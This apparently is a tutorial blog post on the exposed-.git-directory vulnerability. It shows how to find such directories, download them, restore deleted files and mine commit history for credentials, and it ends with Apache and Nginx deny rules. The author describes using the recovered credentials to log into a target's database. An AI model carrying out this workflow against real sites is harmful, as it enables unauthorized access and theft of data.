What is Git?
Git is a widely used code versioning tool for application development. It allows developers to always keep an up-to-date copy of the code and to have greater control over changes made.
Today many applications use GIT to version and/or publish application code. So, like many other new technologies, GIT does its job well but has also opened up new security holes.
And because it is so widely used in application development, some problems can occur, such as the vulnerability I am about to describe.
Dangers of Git Exposed
The danger occurs when the application leaves the “.git” directory, which is in the system root, exposed.
By carelessness, an application that uses Git for versioning can expose the “.git” directory.
This directory of source code can contain sensitive information such as API keys, developer comments, AWS keys, and even the password to a system’s administrative screen and logs of all changes made during development.
Finding the exposed Git
There are numerous ways to locate the exposed git directory but we will focus on the main techniques.
And as the print below shows, git was located manually just by accessing the domain’s ./git.
1. DotGit Extension
There is an extension for Firefox and Chrome called DotGit. As the description itself says “It is an extension to check if a site accessed by the user has an exposed .git repository”. I accessed the site and the extension already accused the exposed git on the page.
By clicking on the extension we can view the site with the git exposed and also have the option to download.
2. Fuzzing
There are numerous tools for fuzzing directories/files, I who am very visual use and like feroxbuster.
If you don’t know this tool yet you can find it here:
In this case it is possible to “fuzz” with feroxbuster, brute-force directories and files from a wordlist.
3. Downloading with WGET
To download the exposed git we will use the command below:
wget : Is a free linux-native program that downloads data from the web.
- mirror : Makes it download everything from git, recursive download.
-I : Creates a file with everything that was downloaded.
After choosing your preferred technique to download the .git, here we can see that a folder of the site we are attacking has been created.
After entering our target folder we will check if there are any contents that we can restore.
To check the git status we will use the command:
git status
As we can see, some files have been deleted, to recover them we can use one of the two commands below:
git checkout -- .
or
git restore .
By running the ls command we can see the files that we have successfully restored.
As stated at the beginning of the article, .git can contain many files with sensitive data. Immediately we can see a very interesting file: admin.php
As we can see the admin.php file gives us the host database credentials, we will use this information shortly.
Reading the Logs
To read the logs just use this command.
git log
The git log command shows a list of all the commits made to a repository. You can see the hash of each Git commit , the message associated with each commit, and more metadata. This command is useful for displaying the history of a repository.
Reading Commits:
To read each commit individually we have to use the following command:
git show “commit-id”
Interesting, we saw in this commit that the developer changed the password for accessing the database, exactly in the file we were able to restore: admin.php
Accessing the target database
Returning to the files we managed to restore we identified the file “Envoy.blade.php”.
Laravel Envoy is a tool for executing common tasks you run on your remote servers. Using Blade style syntax, you can easily setup tasks for deployment,commands, and more.
As you can see, an array of servers is defined at the top of the file, allowing you to reference these servers. Within your task declarations, you should place the shell commands that should execute on your servers when the task is invoked.
Although the credentials report access to the database via localhost, in the Envoy file we can see the servers web pointing to an application IP.
We could run a port scan on this ip but I decided to dare and try to connect directly via mysql to the host and look at the result.
Wow, we have successfully gained access to our target’s entire database.
Mitigation
To fix this vulnerability, either remove the git folder from your webserver or ensure that you deny all access to the .git folders.
Lighttpd
mod_accessserver.modules += ( "mod_access" )Apache 2.2
For Apache 2.2 modify the httpd.conf as follows:
<DirectoryMatch "^/.*/\.git/">
Order deny,allow
Deny from all
</DirectoryMatch>Apache 2.4
For Apache 2.4 modify the httpd.conf as follows:
<DirectoryMatch "^/.*/\.git/">
Require all denied
</DirectoryMatch>Nginx
If you use Nginx, you’ll put this code as the foremost entry in the server-block in your nginx.conf file:
location ~ /.git/ {
deny all;
}Conclusions
I hope you enjoyed the article and that it helped a bit by showing you what git is and the the dangers associated with its misuse in a realistic environment.
This was just a brief summary about Git and its functionality, I think this should be a good start… Keep Learning!
See you soon, bye.
References
https://iosentrix.com/blog/git-source-code-disclosure-vulnerability/
https://gabrieldkgh.medium.com/git-exposed-encontrando-manualmente-e-automatizado-como-explorar-como-arrumar-a-falha-eaa3ee98fe8c
